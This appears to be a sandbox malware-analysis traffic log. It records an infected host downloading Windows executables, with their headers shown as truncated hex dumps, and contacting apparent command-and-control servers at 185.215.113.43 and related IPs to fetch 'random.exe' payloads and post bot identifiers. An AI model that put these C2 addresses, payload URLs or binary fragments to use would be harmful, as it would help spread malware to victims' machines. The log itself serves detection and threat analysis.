00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:21:31 GMTContent-Type: application/octet-streamContent-Length: 1825280Last-Modified: Sat, 23 Nov 2024 01:53:02 GMTConnection: keep-aliveETag: "6741357e-1bda00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 10 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 6a 00 00 04 00 00 c0 aa 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 76 68 70 65 6b 6d 00 40 1a 00 00 c0 4f 00 00 3c 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 6f 78 73 6f 63 76 00 10 00 00 00 00 6a 00 00 04 00 00 00 b4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 6a 00 00 22 00 00 00 b8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:21:40 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Sat, 23 Nov 2024 01:51:09 GMTConnection: keep-aliveETag: "6741350d-e1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 05 35 41 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 62 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 ac ea 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 c4 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 a7 00 00 00 40 0d 00 00 a8 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:21:48 GMTContent-Type: application/octet-streamContent-Length: 2726400Last-Modified: Sat, 23 Nov 2024 01:51:37 GMTConnection: keep-aliveETag: "67413529-299a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 96 c5 29 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 61 7a 75 77 64 6c 64 00 40 29 00 00 a0 00 00 00 38 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 71 6d 73 76 6d 79 00 20 00 00 00 e0 29 00 00 06 00 00 00 72 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:21:55 GMTContent-Type: application/octet-streamContent-Length: 2726400Last-Modified: Sat, 23 Nov 2024 01:51:40 GMTConnection: keep-aliveETag: "6741352c-299a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 96 c5 29 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 61 7a 75 77 64 6c 64 00 40 29 00 00 a0 00 00 00 38 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 71 6d 73 76 6d 79 00 20 00 00 00 e0 29 00 00 06 00 00 00 72 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:22:07 GMTContent-Type: application/octet-streamContent-Length: 2726400Last-Modified: Sat, 23 Nov 2024 01:51:40 GMTConnection: keep-aliveETag: "6741352c-299a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 96 c5 29 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 61 7a 75 77 64 6c 64 00 40 29 00 00 a0 00 00 00 38 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 71 6d 73 76 6d 79 00 20 00 00 00 e0 29 00 00 06 00 00 00 72 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:22:26 GMTContent-Type: application/octet-streamContent-Length: 2726400Last-Modified: Sat, 23 Nov 2024 01:51:40 GMTConnection: keep-aliveETag: "6741352c-299a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 96 c5 29 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 61 7a 75 77 64 6c 64 00 40 29 00 00 a0 00 00 00 38 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 71 6d 73 76 6d 79 00 20 00 00 00 e0 29 00 00 06 00 00 00 72 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1732328690733Host: self.events.data.microsoft.comContent-Length: 7975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008326001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008327001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008328001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
